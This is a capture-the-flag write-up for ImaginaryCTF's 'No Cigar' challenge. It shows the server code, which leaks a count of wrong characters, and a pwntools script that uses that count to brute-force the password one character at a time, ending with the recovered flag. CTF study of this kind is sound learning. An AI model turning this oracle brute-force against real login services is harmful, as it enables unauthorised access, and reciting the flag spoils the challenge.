➜ ~

Playing Hacks and Stuffs!

---

Project maintained by h4ckyou Hosted on GitHub Pages — Theme by mattgraham

Imaginary CTF

MISC

No Cigar

We are given the server source code

#!/usr/bin/env python3

def main():
    flag = open("flag.txt").read()
    while True:
        pwd = input("Enter your password: ").ljust(len(flag))
        if pwd == "exit":
            exit()
        count = sum(pwd[i] != c for i, c in enumerate(flag))
        if count == 0:
            print("Logged in successfully!")
            exit()
        else:
            print(f"Close! You're just {count} character{'s' if count else ''} off of your password.")


if __name__ == '__main__':
    main()

Basically what that does is:

• When we connect and give a password it gives us a way to let us know if we are using the right character
• And the password is the flag

Let me show what I mean

I hosted that running on port 1234

socat tcp-l:1234,reuseaddr,fork EXEC:"python3 server.py"

Now I can connect to it

In my current directory I created a test flag

If we use the right characters the initial number is set to which happens to be the length of the flag reduces

So we have a way of brute forcing the password

I wrote a script to do that for me

from pwn import *
import string
import warnings

warnings.filterwarnings("ignore")
context.log_level = 'debug'

io = remote('localhost', '1234')

flag = ''
charset = string.printable

for i in range(31, 0, -1):
    found = False
    for c in charset:
        io.sendline(flag + c)
        response = io.recvline()
        expected_response = "Close! You're just {} characters".format(i)
        if expected_response.encode() not in response:
            flag += c
            found = True
            break
    if not found:
        print("Flag character not found, check if assumptions are correct.")
        break

log.info(f'Flag: {flag}')

Running it worked

Cool I also ran it remotely and got the flag

Flag: ictf{customer_service_ftw_0d2f}